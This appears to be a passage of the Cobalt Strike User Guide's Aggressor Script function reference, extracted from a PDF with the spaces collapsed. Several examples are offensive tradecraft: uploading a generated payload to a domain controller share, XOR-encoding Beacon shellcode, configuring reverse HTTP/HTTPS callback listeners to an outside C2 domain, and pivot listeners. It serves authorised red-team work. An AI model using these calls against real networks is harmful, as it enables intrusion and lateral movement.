||
bunlink($1, "172.16.48.3");
|
||
bupload
|
||
AskaBeacontouploadafile
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thelocalpathtothefiletoupload
|
||
Example
|
||
bupload($1, script_resource("evil.exe"));
|
||
bupload_raw
|
||
AskaBeacontouploadafile
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-theremotefilenameofthefile
|
||
$3-therawcontentofthefile
|
||
$4-(optional)thelocalpathtothefile(ifthereisone)
|
||
Example
|
||
$data = artifact("my listener", "exe");
|
||
bupload_raw($1, "\\\\DC\\C$\\foo.exe", $data);
|
||
bwdigest
|
||
REMOVED Removed in Cobalt Strike 4.0. Use &bmimikatz directly.
|
||
bwinrm
|
||
CobaltStrikeUserGuide www.fortra.com page:347
|
||
|
||
AggressorScript/Functions
|
||
REMOVED Removed in Cobalt Strike 4.0. Use &bjump with winrm or winrm64 built-in
|
||
options.
|
||
bwmi
|
||
REMOVED Removed in Cobalt Strike 4.0.
|
||
call
|
||
Issueacalltotheteamserver.
|
||
Arguments
|
||
$1-thecommandname
|
||
$2-acallbacktoreceivearesponsetothisrequest.Thecallbackwillreceivetwoarguments.
|
||
Thefirstisthecallname.Thesecondistheresponse.
|
||
...-oneormoreargumentstopassintothiscall.
|
||
Example
|
||
call("aggressor.ping", { warn(@_); }, "this is my value");
|
||
closeClient
|
||
ClosethecurrentCobaltStriketeamserverconnection.
|
||
Example
|
||
closeClient();
|
||
colorPanel
|
||
GenerateaJavacomponenttosetaccentcolorswithinCobaltStrike'sdatamodel
|
||
Arguments
|
||
$1-theprefix
|
||
CobaltStrikeUserGuide www.fortra.com page:348
|
||
|
||
AggressorScript/Functions
|
||
$2-anarrayofIDstochangecolorsfor
|
||
Example
|
||
popup targets {
|
||
menu "&Color" {
|
||
insert_component(colorPanel("targets", $1));
|
||
}
|
||
}
|
||
Seealso
|
||
&highlight
|
||
credential_add
|
||
Addacredentialtothedatamodel
|
||
Arguments
|
||
$1-username
|
||
$2-password
|
||
$3-realm
|
||
$4-source
|
||
$5-host
|
||
Example
|
||
command falsecreds {
|
||
for ($x = 0; $x < 100; $x++) {
|
||
credential_add("user $+ $x", "password $+ $x");
|
||
}
|
||
}
|
||
credentials
|
||
ReturnsalistofapplicationcredentialsinCobaltStrike'sdatamodel.
|
||
CobaltStrikeUserGuide www.fortra.com page:349
|
||
|
||
AggressorScript/Functions
|
||
Returns
|
||
Anarrayofdictionaryobjectswithinformationabouteachcredentialentry.
|
||
Example
|
||
printAll(credentials());
|
||
custom_event
|
||
BroadcastacustomeventtoallCobaltStrikeclients.
|
||
Arguments
|
||
$1-thetopicname
|
||
$2-theeventdata
|
||
Example
|
||
custom_event("my-topic", %(foo => 42, bar => "hello"));
|
||
custom_event_private
|
||
SendacustomeventtoonespecificCobaltStrikeclient.
|
||
Arguments
|
||
$1-whotosendthecustomeventto
|
||
$2-thetopicname
|
||
$3-theeventdata
|
||
Example
|
||
custom_event_private("neo", "my-topic", 42);
|
||
data_keys
|
||
CobaltStrikeUserGuide www.fortra.com page:350
|
||
|
||
AggressorScript/Functions
|
||
Listthequery-ablekeysfromCobaltStrike'sdatamodel
|
||
Returns
|
||
Alistofkeysthatyoumayquerywith&data_query
|
||
Example
|
||
foreach $key (data_keys()) {
|
||
println("\n\c4=== $key ===\n");
|
||
println(data_query($key));
|
||
}
|
||
data_query
|
||
QueriesCobaltStrike'sdatamodel
|
||
Arguments
|
||
$1-thekeytopullfromthedatamodel
|
||
Returns
|
||
ASleeprepresentationofthequerieddata.
|
||
Example
|
||
println(data_query("targets"));
|
||
dbutton_action
|
||
Addsanactionbuttontoa&dialog.Whenthisbuttonispressed,thedialogclosesandits
|
||
callbackiscalled.Youmayaddmultiplebuttonstoadialog.CobaltStrikewilllinethesebuttons
|
||
upinarowandcenterthematthebottomofthedialog.
|
||
Arguments
|
||
$1-the$dialogobject
|
||
$2-thebuttonlabel
|
||
CobaltStrikeUserGuide www.fortra.com page:351
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
dbutton_action($dialog, "Start");
|
||
dbutton_action($dialog, "Stop");
|
||
dbutton_help
|
||
AddsaHelpbuttontoa&dialog.Whenthisbuttonispressed,CobaltStrikewillopentheuser's
|
||
browsertothespecifiedURL.
|
||
Arguments
|
||
$1-the$dialogobject
|
||
$2-theURLtogoto
|
||
Example
|
||
dbutton_help($dialog, "http://www.google.com");
|
||
dialog
|
||
Createadialog.Use&dialog_showtoshowit.
|
||
Arguments
|
||
$1-thetitleofthedialog
|
||
$2-a%dictionarymappingrownamestodefaultvalues
|
||
$3-acallbackfunction.Calledwhentheuserpressesa&dbutton_actionbutton.$1isa
|
||
referencetothedialog.$2isthebuttonname.$3isadictionarythatmapseachrow'snameto
|
||
itsvalue.
|
||
Returns
|
||
Ascalarwitha$dialogobject.
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:352
|
||
|
||
AggressorScript/Functions
|
||
sub callback {
|
||
# prints: Pressed Go, a is: Apple
|
||
println("Pressed $2 $+ , a is: " . $3['a']);
|
||
}
|
||
$dialog = dialog("Hello World", %(a => "Apple", b => "Bat"), &callback);
|
||
drow_text($dialog, "a", "Fruit: ");
|
||
drow_text($dialog, "b", "Rodent: ");
|
||
dbutton_action($dialog, "Go");
|
||
dialog_show($dialog);
|
||
dialog_description
|
||
Addsadescriptiontoa&dialog
|
||
Arguments
|
||
$1-a$dialogobject
|
||
$2-thedescriptionofthisdialog
|
||
Example
|
||
dialog_description($dialog, "I am the Hello World dialog.");
|
||
dialog_show
|
||
Showsa&dialog.
|
||
Arguments
|
||
$1-the$dialogobject
|
||
Example
|
||
dialog_show($dialog);
|
||
dispatch_event
|
||
CallafunctioninJavaSwing'sEventDispatchThread.Java'sSwingLibraryisnotthreadsafe.
|
||
AllchangestotheuserinterfaceshouldhappenfromtheEventDispatchThread.
|
||
CobaltStrikeUserGuide www.fortra.com page:353
|
||
|
||
AggressorScript/Functions
|
||
Arguments
|
||
$1-thefunctiontocall
|
||
Example
|
||
dispatch_event({
|
||
println("Hello World");
|
||
});
|
||
downloads
|
||
ReturnsalistofdownloadsinCobaltStrike'sdatamodel.
|
||
Returns
|
||
Anarrayofdictionaryobjectswithinformationabouteachdownloadedfile.
|
||
Example
|
||
printAll(downloads());
|
||
drow_beacon
|
||
Addsabeaconselectionrowtoa&dialog
|
||
Arguments
|
||
$1-a$dialogobject
|
||
$2-thenameofthisrow
|
||
$3-thelabelforthisrow
|
||
Example
|
||
drow_beacon($dialog, "bid", "Session: ");
|
||
drow_checkbox
|
||
CobaltStrikeUserGuide www.fortra.com page:354
|
||
|
||
AggressorScript/Functions
|
||
Addsacheckboxtoa&dialog
|
||
Arguments
|
||
$1-a$dialogobject
|
||
$2-thenameofthisrow
|
||
$3-thelabelforthisrow
|
||
$4-thetextnexttothecheckbox
|
||
Example
|
||
drow_checkbox($dialog, "box", "Scary: ", "Check me... if you dare");
|
||
drow_combobox
|
||
Addsacomboboxtoa&dialog
|
||
Arguments
|
||
$1-a$dialogobject
|
||
$2-thenameofthisrow
|
||
$3-thelabelforthisrow
|
||
$4-anarrayofoptionstochoosefrom
|
||
Example
|
||
drow_combobox($dialog, "combo", "Options", @("apple", "bat", "cat"));
|
||
drow_exploits
|
||
Addsaprivilegeescalationexploitselectionrowtoa&dialog
|
||
Arguments
|
||
$1-a$dialogobject
|
||
CobaltStrikeUserGuide www.fortra.com page:355
|
||
|
||
AggressorScript/Functions
|
||
$2-thenameofthisrow
|
||
$3-thelabelforthisrow
|
||
Example
|
||
drow_exploits($dialog, "exploit", "Exploit: ");
|
||
drow_file
|
||
Addsafilechooserrowtoa&dialog
|
||
Arguments
|
||
$1-a$dialogobject
|
||
$2-thenameofthisrow
|
||
$3-thelabelforthisrow
|
||
Example
|
||
drow_file($dialog, "file", "Choose: ");
|
||
drow_interface
|
||
AddsaVPNinterfaceselectionrowtoa&dialog
|
||
Arguments
|
||
$1-a$dialogobject
|
||
$2-thenameofthisrow
|
||
$3-thelabelforthisrow
|
||
Example
|
||
drow_interface($dialog, "int", "Interface: ");
|
||
CobaltStrikeUserGuide www.fortra.com page:356
|
||
|
||
AggressorScript/Functions
|
||
drow_krbtgt
|
||
Addsakrbtgtselectionrowtoa&dialog
|
||
Arguments
|
||
$1-a$dialogobject
|
||
$2-thenameofthisrow
|
||
$3-thelabelforthisrow
|
||
Example
|
||
drow_krbtgt($dialog, "hash", "krbtgt hash: ");
|
||
drow_listener
|
||
Addsalistenerselectionrowtoa&dialog.Thisrowonlyshowslistenerswithstagers(e.g.,
|
||
windows/beacon_https/reverse_https).
|
||
Arguments
|
||
$1-a$dialogobject
|
||
$2-thenameofthisrow
|
||
$3-thelabelforthisrow
|
||
Example
|
||
drow_listener($dialog, "listener", "Listener: ");
|
||
drow_listener_smb
|
||
DEPRECATED This function is deprecated in Cobalt Strike 4.0. It's now equivalent to
|
||
&drow_listener_stage
|
||
drow_listener_stage
|
||
CobaltStrikeUserGuide www.fortra.com page:357
|
||
|
||
AggressorScript/Functions
|
||
Addsalistenerselectionrowtoa&dialog.ThisrowshowsallBeaconandForeignlistener
|
||
payloads.
|
||
Arguments
|
||
$1-a$dialogobject
|
||
$2-thenameofthisrow
|
||
$3-thelabelforthisrow
|
||
Example
|
||
drow_listener_stage($dialog, "listener", "Stage: ");
|
||
drow_mailserver
|
||
Addsamailserverfieldtoa&dialog.
|
||
Arguments
|
||
$1-a$dialogobject
|
||
$2-thenameofthisrow
|
||
$3-thelabelforthisrow
|
||
Example
|
||
drow_mailserver($dialog, "mail", "SMTP Server: ");
|
||
drow_proxyserver
|
||
DEPRECATED This function is deprecated in Cobalt Strike 4.0. The proxy configuration is
|
||
now tied directly to the listener.
|
||
Addsaproxyserverfieldtoa&dialog.
|
||
Arguments
|
||
$1-a$dialogobject
|
||
CobaltStrikeUserGuide www.fortra.com page:358
|
||
|
||
AggressorScript/Functions
|
||
$2-thenameofthisrow
|
||
$3-thelabelforthisrow
|
||
Example
|
||
drow_proxyserver($dialog, "proxy", "Proxy: ");
|
||
drow_site
|
||
Addsasite/URLfieldtoa&dialog.
|
||
Arguments
|
||
$1-a$dialogobject
|
||
$2-thenameofthisrow
|
||
$3-thelabelforthisrow
|
||
Example
|
||
drow_site($dialog, "url", "Site: ");
|
||
drow_text
|
||
Addsatextfieldrowtoa&dialog
|
||
Arguments
|
||
$1-a$dialogobject
|
||
$2-thenameofthisrow
|
||
$3-thelabelforthisrow
|
||
$4-Optional.Thewidthofthistextfield(incharacters).Thisvalueisn'talwayshonored(it
|
||
won'tshrinkthefield,butitwillmakeitwider).
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:359
|
||
|
||
AggressorScript/Functions
|
||
drow_text($dialog, "name", "Name: ");
|
||
drow_text_big
|
||
Addsamulti-linetextfieldtoa&dialog
|
||
Arguments
|
||
$1-a$dialogobject
|
||
$2-thenameofthisrow
|
||
$3-thelabelforthisrow
|
||
Example
|
||
drow_text_big($dialog, "addr", "Address: ");
|
||
dstamp
|
||
Formatatimeintoadate/timevalue.Thisvalueincludesseconds.
|
||
Arguments
|
||
$1-thetime[millisecondssincetheUNIXepoch]
|
||
Example
|
||
println("The time is now: " . dstamp(ticks()));
|
||
Seealso
|
||
&tstamp
|
||
elog
|
||
Publishanotificationtotheeventlog
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:360
|
||
|
||
AggressorScript/Functions
|
||
$1-themessage
|
||
Example
|
||
elog("The robot invasion has begun!");
|
||
encode
|
||
Obfuscateaposition-independentblobofcodewithanencoder.
|
||
Arguments
|
||
$1-positionindependentcode(e.g.,shellcode,"raw"stagelessBeacon)toapplyencoderto
|
||
$2-theencodertouse
|
||
$3-thearchitecture(e.g.,x86,x64)
|
||
Encoder Description
|
||
alpha Alphanumericencoder(x86-only)
|
||
xor XOR encoder
|
||
Notes
|
||
l Theencodedposition-independentblobmustrunfrom amemorypagethathasRWX
|
||
permissionsorthedecodestepwillcrashthecurrentprocess.
|
||
l alpha encoder:TheEDIregistermustcontaintheaddressoftheencodedblob.
|
||
&encodeprependsa10-byte(non-alphanumeric)program tothebeginningofthe
|
||
alphanumericencodedblob.Thisprogram calculatesthelocationoftheencodedblob
|
||
andsetsEDIforyou.IfyouplantosetEDIyourself,youmayremovethesefirst10bytes.
|
||
Returns
|
||
Aposition-independentblobthatdecodestheoriginalstringandpassesexecutiontoit.
|
||
Example
|
||
# generate shellcode for a listener
|
||
$stager = shellcode("my listener", false "x86");
|
||
CobaltStrikeUserGuide www.fortra.com page:361
|
||
|
||
AggressorScript/Functions
|
||
# encode it.
|
||
$stager = encode($stager, "xor", "x86");
|
||
extract_reflective_loader
|
||
ExtracttheexecutablecodeforareflectiveloaderfromaBeaconObjectFile(BOF).
|
||
Arguments
|
||
$1-BeaconObjectFiledatathatcontainsareflectiveloader.
|
||
Returns
|
||
TheReflectiveLoaderbinaryexecutablecodeextractedfromtheBeaconObjectFiledata.
|
||
Example
|
||
SeeBEACON_RDLL_GENERATEhook
|
||
# ---------------------------------------------------------------------
|
||
# extract loader from BOF.
|
||
# ---------------------------------------------------------------------
|
||
$loader = extract_reflective_loader($data);
|
||
file_browser
|
||
OpentheFileBrowser.Thisfunctiondoesnothaveanyparameters.
|
||
fireAlias
|
||
Runsauser-definedalias
|
||
Arguments
|
||
$1-thebeaconidtorunthealiasagainst
|
||
$2-thealiasnametorun
|
||
$3-theargumentstopasstothealias.
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:362
|
||
|
||
AggressorScript/Functions
|
||
# run the foo alias when a new Beacon comes in
|
||
on beacon_initial {
|
||
fireAlias($1, "foo", "bar!");
|
||
}
|
||
fireEvent
|
||
Fireanevent.
|
||
Arguments
|
||
$1-theeventname
|
||
...-theeventarguments.
|
||
Example
|
||
on foo {
|
||
println("Argument is: $1");
|
||
}
|
||
fireEvent("foo", "Hello World!");
|
||
format_size
|
||
Formatsanumberintoasize(e.g.,1024=>1kb)
|
||
Arguments
|
||
$1-thesizetoformat
|
||
Returns
|
||
Astringrepresentingahumanreadabledatasize.
|
||
Example
|
||
println(format_size(1024));
|
||
getAggressorClient
|
||
CobaltStrikeUserGuide www.fortra.com page:363
|
||
|
||
AggressorScript/Functions
|
||
Returnstheaggressor.AggressorClientJavaobject.Thiscanreachanythinginternalwithinthe
|
||
currentCobaltStrikeclientcontext.
|
||
Example
|
||
$client = getAggressorClient();
|
||
gunzip
|
||
Decompressastring(GZIP).
|
||
Arguments
|
||
$1-thestringtocompress
|
||
Returns
|
||
Theargumentprocessedbythegzipde-compressor
|
||
Example
|
||
println(gunzip(gzip("this is a test")));
|
||
Seealso
|
||
&gzip
|
||
gzip
|
||
GZIPastring.
|
||
Arguments
|
||
$1-thestringtocompress
|
||
Returns
|
||
Theargumentprocessedbythegzipcompressor
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:364
|
||
|
||
AggressorScript/Functions
|
||
println(gzip("this is a test"));
|
||
Seealso
|
||
&gunzip
|
||
highlight
|
||
Insertanaccent(colorhighlight)intoCobaltStrike'sdatamodel
|
||
Arguments
|
||
$1-thedatamodel
|
||
$2-anarrayofrowstohighlight
|
||
$3-theaccenttype
|
||
Notes
|
||
l Datamodelrowsinclude:applications,beacons,credentials,listeners,services,and
|
||
targets.
|
||
l Accentoptionsare:
|
||
Accent Color
|
||
[empty] nohighlight
|
||
good Green
|
||
bad Red
|
||
neutral Yellow
|
||
ignore Grey
|
||
cancel DarkBlue
|
||
Example
|
||
command admincreds {
|
||
local('@creds');
|
||
# find all of our creds that are user Administrator.
|
||
foreach $entry (credentials()) {
|
||
CobaltStrikeUserGuide www.fortra.com page:365
|
||
|
||
AggressorScript/Functions
|
||
if ($entry['user'] eq "Administrator") {
|
||
push(@creds, $entry);
|
||
}
|
||
}
|
||
# highlight all of them green!
|
||
highlight("credentials", @creds, "good");
|
||
}
|
||
host_delete
|
||
Deleteahostfromthetargetsmodel
|
||
Arguments
|
||
$1-theIPv4orIPv6addressofthistarget[youmayspecifyanarrayofhoststoo]
|
||
Example
|
||
# clear all hosts
|
||
host_delete(hosts());
|
||
host_info
|
||
Getinformationaboutatarget.
|
||
Arguments
|
||
$1-thehostIPv4orIPv6address
|
||
$2-[Optional]thekeytoextractavaluefor
|
||
Returns
|
||
%info = host_info("address");
|
||
Returnsadictionarywithknowninformationaboutthistarget.
|
||
$value = host_info("address", "key");
|
||
Returnsthevalueforthespecifiedkeyfromthistarget'sentryinthedatamodel.
|
||
CobaltStrikeUserGuide www.fortra.com page:366
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
# create a script console alias to dump host info
|
||
command host {
|
||
println("Host $1");
|
||
foreach $key => $value (host_info($1)) {
|
||
println("$[15]key $value");
|
||
}
|
||
}
|
||
host_update
|
||
Addorupdateahostinthetargetsmodel
|
||
Arguments
|
||
$1-theIPv4orIPv6addressofthistarget[youmayspecifyanarrayofhoststoo]
|
||
$2-theDNSnameofthistarget
|
||
$3-thetarget'soperatingsystem
|
||
$4-theoperatingsystemversionnumber(e.g.,10.0)
|
||
$5-anoteforthetarget.
|
||
Note
|
||
Youmayspecifya$nullvalueforanyargumentand,ifthehostexists,nochangewillbemade
|
||
tothatvalue.
|
||
Example
|
||
host_update("192.168.20.3", "DC", "Windows", 10.0);
|
||
hosts
|
||
ReturnsalistofIPaddressesfromCobaltStrike'stargetmodel
|
||
Returns
|
||
CobaltStrikeUserGuide www.fortra.com page:367
|
||
|
||
AggressorScript/Functions
|
||
AnarrayofIPaddresses
|
||
Example
|
||
printAll(hosts());
|
||
insert_component
|
||
Addajavax.swing.JComponentobjecttothemenutree
|
||
Arguments
|
||
$1-thecomponenttoadd
|
||
insert_menu
|
||
Bringmenusassociatedwithapopuphookintothecurrentmenutree.
|
||
Arguments
|
||
$1-thepopuphook
|
||
...-additionalargumentsarepassedtothechildpopuphook.
|
||
Example
|
||
popup beacon {
|
||
# menu definitions above this point
|
||
insert_menu("beacon_bottom", $1);
|
||
# menu definitions below this point
|
||
}
|
||
iprange
|
||
GenerateanarrayofIPv4addressesbasedonastringdescription
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:368
|
||
|
||
AggressorScript/Functions
|
||
$1-astringwithadescriptionofIPv4ranges
|
||
Range Result
|
||
192.168.1.2 TheIP4address192.168.1.2
|
||
192.168.1.1,192.168.1.2 TheIPv4addresses192.168.1.1and192.168.1.2
|
||
192.168.1.0/24 TheIPv4addresses192.168.1.0through192.168.1.255
|
||
192.168.1.18-192.168.1.30 TheIPv4addresses192.168.1.18through192.168.1.29
|
||
192.168.1.18-30 TheIPv4addresses192.168.1.18through192.168.1.29
|
||
Returns
|
||
AnarrayofIPv4addresseswithinthespecifiedranges.
|
||
Example
|
||
printAll(iprange("192.168.1.0/25"));
|
||
keystrokes
|
||
ReturnsalistofkeystrokesfromCobaltStrike'sdatamodel.
|
||
Returns
|
||
Anarrayofdictionaryobjectswithinformationaboutrecordedkeystrokes.
|
||
Example
|
||
printAll(keystrokes());
|
||
licenseKey
|
||
DEPRECATED This function is deprecated in Cobalt Strike 4.6. The function will now
|
||
return an empty string.
|
||
GetthelicensekeyforthisinstanceofCobaltStrike
|
||
Returns
|
||
CobaltStrikeUserGuide www.fortra.com page:369
|
||
|
||
AggressorScript/Functions
|
||
Yourlicensekey.
|
||
Example
|
||
println("Your key is: " . licenseKey());
|
||
listener_create
|
||
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &listener_create_ext
|
||
Createanewlistener.
|
||
Arguments
|
||
$1-thelistenername
|
||
$2-thepayload(e.g.,windows/beacon_http/reverse_http)
|
||
$3-thelistenerhost
|
||
$4-thelistenerport
|
||
$5-acommaseparatedlistofaddressesforlistenertobeaconto
|
||
Example
|
||
# create a foreign listener
|
||
listener_create("My Metasploit", "windows/foreign_https/reverse_https",
|
||
"ads.losenolove.com", 443);
|
||
# create an HTTP Beacon listener
|
||
listener_create("Beacon HTTP", "windows/beacon_http/reverse_http",
|
||
"www.losenolove.com", 80,
|
||
"www.losenolove.com, www2.losenolove.com");
|
||
listener_create_ext
|
||
Createanewlistener.
|
||
Arguments
|
||
$1-thelistenername
|
||
CobaltStrikeUserGuide www.fortra.com page:370
|
||
|
||
AggressorScript/Functions
|
||
$2-thepayload(e.g.,windows/beacon_http/reverse_http)
|
||
$3-amapwithkey/valuepairsthatspecifyoptionsforthelistener
|
||
Note
|
||
Thefollowingpayloadoptionsarevalidfor$2:
|
||
Payload Type
|
||
windows/beacon_dns/reverse_dns_txt BeaconDNS
|
||
windows/beacon_http/reverse_http BeaconHTTP
|
||
windows/beacon_https/reverse_https BeaconHTTPS
|
||
windows/beacon_bind_pipe BeaconSMB
|
||
windows/beacon_bind_tcp BeaconTCP
|
||
windows/beacon_extc2 ExternalC2
|
||
windows/foreign/reverse_http ForeignHTTP
|
||
windows/foreign/reverse_https ForeignHTTPS
|
||
Thefollowingkeysarevalidfor$3:
|
||
Key DNS HTTP/S SMB TCP (Bind)
|
||
althost HTTPHostHeader
|
||
bindto bindport bindport
|
||
beacons c2hosts c2hosts bindhost
|
||
host staginghost staginghost
|
||
maxretry maxretry maxretry
|
||
port c2port c2port pipename port
|
||
profile profilevariant
|
||
proxy proxyconfig
|
||
strategy hostrotation hostrotation
|
||
ThefollowinghostrotationValuesarevalidforthe'strategy'Key:
|
||
CobaltStrikeUserGuide www.fortra.com page:371
|
||
|
||
AggressorScript/Functions
|
||
Option
|
||
round-robin
|
||
random
|
||
failover
|
||
failover-5x
|
||
failover-50x
|
||
failover-100x
|
||
failover-1m
|
||
failover-5m
|
||
failover-15m
|
||
failover-30m
|
||
failover-1h
|
||
failover-3h
|
||
failover-6h
|
||
failover-12h
|
||
failover-1d
|
||
rotate-1m
|
||
rotate-5m
|
||
rotate-15m
|
||
rotate-30m
|
||
rotate-1h
|
||
rotate-3h
|
||
rotate-6h
|
||
rotate-12h
|
||
rotate-1d
|
||
Note
|
||
Themaxretryvalueusesthefollowingsyntaxofexit-[max_attempts]-[increase_attempts]-
|
||
[duration][m,h,d].Forexample'exit-10-5-5m'willexitbeaconafter10failedattemptsandwill
|
||
increasesleeptimeafter5failedattemptsto5minutes.Thesleeptimewillnotbeupdatedifthe
|
||
currentsleeptimeisgreaterthanthespecifieddurationvalue.Thesleeptimewillbeaffectedby
|
||
CobaltStrikeUserGuide www.fortra.com page:372
|
||
|
||
AggressorScript/Functions
|
||
thecurrentjittervalue.Onasuccessfulconnectionthefailedattemptscountwillberesetto
|
||
zeroandthesleeptimewillberesettothepriorvalue.
|
||
TheproxyconfigurationstringisthesamestringyouwouldinputintoCobaltStrike'slistener
|
||
dialog.*direct*ignoresthelocalproxyconfigurationandattemptsadirectconnection.
|
||
protocol://user:[email protected]:portspecifieswhichproxyconfigurationthe
|
||
artifactshoulduse.Theusernameandpasswordareoptional(e.g.,
|
||
protocol://host:portisfine).Theacceptableprotocolsaresocksandhttp.Setthe
|
||
proxyconfigurationstringto$nullor""tousethedefaultbehavior.
|
||
Example
|
||
# create a foreign listener
|
||
listener_create_ext("My Metasploit", "windows/foreign/reverse_https",
|
||
%(host => "ads.losenolove.com", port => 443));
|
||
# create an HTTP Beacon listener
|
||
listener_create_ext("Beacon HTTP", "windows/beacon_http/reverse_http",
|
||
%(host => "www.losenolove.com", port => 80,
|
||
beacons => "www.losenolove.com, www2.losenolove.com"));
|
||
# create an HTTP Beacon listener
|
||
listener_create_ext("HTTP", "windows/beacon_http/reverse_http",
|
||
%(host => "stage.host",
|
||
profile => "default",
|
||
port => 80,
|
||
beacons => "b1.host,b2.host",
|
||
althost => "alt.host",
|
||
bindto => 8080,
|
||
strategy => "failover-5x",
|
||
max_retry => "exit-10-5-5m",
|
||
proxy => "proxy.host"));
|
||
listener_delete
|
||
Stopandremovealistener.
|
||
Arguments
|
||
$1-thelistenername
|
||
Example
|
||
listener_delete("Beacon HTTP");
|
||
CobaltStrikeUserGuide www.fortra.com page:373
|
||
|
||
AggressorScript/Functions
|
||
listener_describe
|
||
Describealistener.
|
||
Arguments
|
||
$1-thelistenername
|
||
$2-(optional)theremotetargetthelistenerisdestinedfor
|
||
Returns
|
||
Astringdescribingthelistener
|
||
Example
|
||
foreach $name (listeners()) {
|
||
println("$name is: " . listener_describe($name));
|
||
}
|
||
listener_info
|
||
Getinformationaboutalistener.
|
||
Arguments
|
||
$1-thelistenername
|
||
$2-(optional)thekeytoextractavaluefor
|
||
Returns
|
||
%info = listener_info("listener name");
|
||
Returnsadictionarywiththemetadataforthislistener.
|
||
$value = listener_info("listener name", "key");
|
||
Returnsthevalueforthespecifiedkeyfromthislistener'smetadata
|
||
CobaltStrikeUserGuide www.fortra.com page:374
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
# create a script console alias to dump listener info
|
||
command dump {
|
||
println("Listener $1");
|
||
foreach $key => $value (listener_info($1)) {
|
||
println("$[15]key $value");
|
||
}
|
||
}
|
||
listener_pivot_create
|
||
Createanewpivotlistener.
|
||
Arguments
|
||
$1-theBeaconID
|
||
$2-thelistenername
|
||
$3-thepayload(e.g.,windows/beacon_reverse_tcp)
|
||
$4-thelistenerhost
|
||
$5-thelistenerport
|
||
Note
|
||
Theonlyvalidpayloadargumentiswindows/beacon_reverse_tcp.
|
||
Example
|
||
# create a pivot listener:
|
||
# $1 = beaconID, $2 = name, $3 = port
|
||
alias plisten {
|
||
local('$lhost $bid $name $port');
|
||
# extract our arguments
|
||
($bid, $name, $port) = @_;
|
||
# get the name of our target
|
||
$lhost = beacon_info($1, "computer");
|
||
CobaltStrikeUserGuide www.fortra.com page:375
|
||
|
||
AggressorScript/Functions
|
||
btask($1, "create TCP listener on $lhost $+ : $+ $port");
|
||
listener_pivot_create($1, $name, "windows/beacon_reverse_tcp", $lhost,
|
||
$port);
|
||
}
|
||
listener_restart
|
||
Restartalistener
|
||
Arguments
|
||
$1-thelistenername
|
||
Example
|
||
listener_restart("Beacon HTTP");
|
||
listeners
|
||
Returnalistoflistenernames(withstagersonly!)acrossallteamserversthisclientis
|
||
connectedto.
|
||
Returns
|
||
Anarrayoflistenernames.
|
||
Example
|
||
printAll(listeners());
|
||
listeners_local
|
||
Returnalistoflistenernames.Thisfunctionlimitsitselftothecurrentteamserveronly.External
|
||
C2listenernamesareomitted.
|
||
Returns
|
||
Anarrayoflistenernames.
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:376
|
||
|
||
AggressorScript/Functions
|
||
printAll(listeners_local());
|
||
listeners_stageless
|
||
Returnalistoflistenernamesacrossallteamserversthisclientisconnectedto.ExternalC2
|
||
listenersarefiltered(asthey'renotactionableviastagingorexportingasaReflectiveDLL).
|
||
Returns
|
||
Anarrayoflistenernames.
|
||
Example
|
||
printAll(listeners_stageless());
|
||
localip
|
||
GettheIPaddressassociatedwiththeteamserver.
|
||
Returns
|
||
Astringwiththeteamserver'sIPaddress.
|
||
Example
|
||
println("I am: " . localip());
|
||
menubar
|
||
Addatop-levelitemtothemenubar.
|
||
Arguments
|
||
$1-thedescription
|
||
$2-thepopuphook
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:377
|
||
|
||
AggressorScript/Functions
|
||
popup mythings {
|
||
item "Keep out" {
|
||
}
|
||
}
|
||
menubar("My &Things", "mythings");
|
||
mynick
|
||
GetthenicknameassociatedwiththecurrentCobaltStrikeclient.
|
||
Returns
|
||
Astringwithyournickname.
|
||
Example
|
||
println("I am: " . mynick());
|
||
nextTab
|
||
Activatethetabthatistotherightofthecurrenttab.
|
||
Example
|
||
bind Ctrl+Right {
|
||
nextTab();
|
||
}
|
||
on
|
||
Registeraneventhandler.Thisisanalternatetotheonkeyword.
|
||
Arguments
|
||
$1-thenameoftheeventtorespondto
|
||
$2-acallbackfunction.Calledwhentheeventhappens.
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:378
|
||
|
||
AggressorScript/Functions
|
||
sub foo {
|
||
blog($1, "Foo!");
|
||
}
|
||
on("beacon_initial", &foo);
|
||
openAboutDialog
|
||
Openthe"AboutCobaltStrike"dialog
|
||
Example
|
||
openAboutDialog();
|
||
openApplicationManager
|
||
Opentheapplicationmanager(systemprofilerresults)tab.
|
||
Example
|
||
openApplicationManager();
|
||
openAutoRunDialog
|
||
Opentheautorundialog.
|
||
Example
|
||
openAutoRunDialog();
|
||
openBeaconBrowser
|
||
Openthebeaconbrowsertab.
|
||
Example
|
||
openBeaconBrowser();
|
||
openBeaconConsole
|
||
CobaltStrikeUserGuide www.fortra.com page:379
|
||
|
||
AggressorScript/Functions
|
||
OpentheconsoletointeractwithaBeacon
|
||
Arguments
|
||
$1-theBeaconIDtoapplythisfeatureto
|
||
Example
|
||
item "Interact" {
|
||
local('$bid');
|
||
foreach $bid ($1) {
|
||
openBeaconConsole($bid);
|
||
}
|
||
}
|
||
openBrowserPivotSetup
|
||
openthebrowserpivotsetupdialog
|
||
Arguments
|
||
$1-theBeaconIDtoapplythisfeatureto
|
||
Example
|
||
item "Browser Pivoting" {
|
||
local('$bid');
|
||
foreach $bid ($1) {
|
||
openBrowserPivotSetup($bid);
|
||
}
|
||
}
|
||
openBypassUACDialog
|
||
REMOVEDRemovedinCobaltStrike4.1.
|
||
openCloneSiteDialog
|
||
Openthedialogforthewebsiteclonetool.
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:380
|
||
|
||
AggressorScript/Functions
|
||
openCloneSiteDialog();
|
||
openConnectDialog
|
||
Opentheconnectdialog.
|
||
Example
|
||
openConnectDialog();
|
||
openCovertVPNSetup
|
||
opentheCovertVPNsetupdialog
|
||
